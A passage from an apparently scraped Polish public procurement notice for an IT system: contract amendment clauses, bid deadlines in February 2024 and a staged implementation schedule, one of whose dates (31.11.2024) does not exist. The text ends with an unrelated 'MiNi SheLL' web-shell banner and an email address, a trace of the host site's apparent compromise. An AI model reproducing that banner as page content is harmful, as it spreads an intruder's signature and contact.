Umowy – zgodnie z art. 455 ust. 1 ustawy Pzp, za zgodą obu Stron.<br/>2.<br/>Zamawiający przewiduje możliwość zmian w przypadku wystąpienia, co najmniej jednej z okoliczności wymienionej poniżej, z uwzględnieniem wskazanych warunków ich wprowadzenia:<br/>1)<br/>wprowadzenie nowej wersji oprogramowania lub innych nowych elementów Systemu przez producenta, z zastrzeżeniem, że wskutek zmiany wszystkie wymagania określone w dokumentach zamówienia oraz w ofercie Wykonawcy zostaną zachowane, a wynagrodzenie Wykonawcy nie ulegnie podwyższeniu;<br/>2)<br/>ograniczenie dostępności poszczególnych elementów Systemu, o ile elementy zastępcze spełniają wszystkie wymagania określone w dokumentach zamówienia i ofercie Wykonawcy, z zastrzeżeniem, że Wykonawca, pomimo zachowania należytej staranności, nie mógł temu zapobiec;<br/>3)<br/>zmiana powszechnie obowiązujących przepisów prawa powodującej konieczność dokonania zmiany przedmiotu umowy, o ile zmiany przepisów prawa wystąpiły po upływie terminu składania ofert;<br/>4)<br/>ujawnienie się powszechnie występujących wad oferowanych elementów systemu i zastąpienia ich innym rozwiązaniem umożliwiającym należyte wykonanie Umowy, o ile nowe rozwiązanie będzie spełniało wszystkie wymagania wynikające ze SWZ oraz oferty Wykonawcy, a wynagrodzenie Wykonawcy nie ulegnie podwyższeniu;<br/>5)<br/>zmiana terminu wykonania Umowy w sytuacji opóźnień powstałych z przyczyn, za które – zgodnie z umową – Wykonawca i Zamawiający nie odpowiadają. Termin wykonania Umowy może ulec zmianie o czas, o jaki wyżej wskazane okoliczności wpłynęły na termin wykonania Umowy przez Wykonawcę, to jest uniemożliwiły Wykonawcy terminową realizację przedmiotu<br/>33<br/>U<br/>mowy;<br/>6)<br/>zmiana terminu realizacji przedmiotu Umowy, gdy wynika z przyczyn działania siły wyższej. Przez siłę wyższą Strony rozumieją okoliczności niemożliwe do przewidzenia w chwili zawierania Umowy, niezależne od woli Stron, na których powstanie żadna ze Stron nie miała wpływu i których powstaniu nie mogła zapobiec. Za siłę wyższą uważa się w szczególności: klęski żywiołowe, katastrofy, mobilizację, embargo, zamknięcie granic, anomalia pogodowe. Termin zostanie wydłużony wyłącznie o okres działania siły wyższej, w okresie którym przedmiot Umowy nie będzie mógł być realizowany;<br/>7)<br/>zmiana terminu wykonania przedmiotu zamówienia z powodu nie wywiązania się przez Zamawiającego z obowiązków wynikających z §2 ust. 10 Umowy. Termin wykonania przedmiotu Zamówienia zostanie w takim przypadku wydłużony o czas opóźnienia Zamawiającego w realizacji danych zobowiązań Zamawiającego wynikających z §2 ust. 10 Umowy. Wysokość wynagrodzenia Wykonawcy z tego tytułu nie może ulec zmianie;<br/>8)<br/>zmiana etapów wykonania Umowy lub podziału płatności wynagrodzenia poprzez podzielenie etapów lub zmianę terminu płatności wynagrodzenia, w sytuacji gdy:<br/>a)<br/>z przyczyn niezależnych od Wykonawcy wykonanie poszczególnych elementów systemu w danym etapie nie jest możliwe, a zrealizowane dotychczas czynności w ramach etapu są możliwe do odebrania przez Zamawiającego,<br/>b)<br/>ze względów technicznych lub technologicznych zmianie powinna ulec kolejność wykonania poszczególnych etapów wdrożenia lub czynności podejmowanych w ramach danego etapu,<br/>c)<br/>ze względu na zmianę Umowy, o ile ma ona wpływ na zakres przedmiotowy etapów Umowy lub podział płatności wynagrodzenia;<br/>9)<br/>w zakresie funkcjonalności oferowanego systemu w stosunku do wymagań Zamawiającego wynikających z dokumentów zamówienia lub oferty Wykonawcy, w sytuacji gdy w toku realizacji umowy wdrożenie tych funkcjonalności okaże się zbędne dla Zamawiającego albo uzyskanie możliwości objętych daną funkcjonalnością będzie możliwe przy zastosowaniu innych rozwiązań;<br/>10)<br/>powstania rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie będzie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej postanowień przez Strony. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-02-26 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma prowadzonego postępowania</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-02-26 12:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-03-26</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Terminy realizacji zamówienia:<br/>Etap I – Analiza przedwdrożeniowa - 8 tygodni od dnia podpisania umowy, <br/>Etap II – Przygotowanie, instalacja, konfiguracja wersji testowej i produkcyjnej Systemu - 10 tygodni od dnia zakończenia poprzedniego etapu<br/>Etap III – Migracja danych, testy Systemu, uruchomienie produkcyjne i szkolenia - 10 tygodni od zakończenia realizacji Etapu II, ale nie później niż do 31.11.2024 r. <br/>Etap IV – Eksploatacja Systemu/ Gwarancja/ Usługa wsparcia/ Realizacja godzin rozwojowych/ Usługa hostingowa - 24 miesiące od zakończenia realizacji Etapu III

Creat By MiNi SheLL
Email: jattceo@gmail.com